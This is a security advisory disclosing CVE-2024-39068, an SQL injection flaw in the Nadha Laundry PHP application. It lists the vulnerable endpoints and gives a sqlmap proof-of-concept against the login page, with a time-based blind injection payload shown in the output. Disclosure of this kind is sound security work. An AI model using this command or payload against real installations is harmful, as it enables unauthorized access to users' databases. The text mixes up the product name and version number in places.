SQL Injection at Nadha Laundry v3.2.1
Summary
During my vulnerability research on an open-source project, I discovered SQL Injection vulnerabilities at several endpoint in Nadha Laundry, a laundry management application using PHP & MYSQL developed by by NadhaMedia.
Software Details
Detail about POS Nadha Resto.
| Parameter | Value |
|---|---|
| Software | Nadha Laundry |
| Description | Laundry Management App based on Uinsu Web Framework |
| Developer | Aditia Darma Nasution, Hasnah Nur Ardita |
| Vendor URL | https://github.com/haxorsprogramming |
| Software URL | https://github.com/haxorsprogramming/Nadha-Laundry |
SQL Injection at Several Endpoint
Vulnerability Summary:
| Parameter | Value |
|---|---|
| CVE-ID | CVE-2024-39068 |
| Classification | SQL Injection |
| Description | SQL Injection vulnerabilities have been discovered in multiple parameters of Nadha Laundry, both in authenticated and unauthenticated states. |
| Required privilege | Low, Unauth |
| Affected Version | 3.2.0 (#0~612c17a) |
| Publicly disclosed | 13.06.2024 |
We have discovered SQL Injection vulnerabilities in all endpoint that interacts with the database. The following are examples of such endpoints:
- POST /Nadha-Laundry/login/prosesLogin
- POST /Nadha-Laundry/utility/getInfoPelanggan
- etc
Note: All parameter on affected endpoint is vulnerable to SQL Injection.
This is an example PoC of how to exploit SQL Injection on a login page.
sqlmap
sqlmap -u http://localhost/Nadha-Laundry/login/prosesLogin --data="username=a&password=x" -p username --flush-session --batch --dbms=mysql
Response:
sqlmap identified the following injection point(s) with a total of 65 HTTP(s) requests:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=a' AND (SELECT 6511 FROM (SELECT(SLEEP(5)))OmZe) AND 'VqXT'='VqXT&password=x
Timeline
- 10 June 2024 - Found the vulnerability
- 10 June 2024 - Contact the developer
- 14 June 2024 - Article published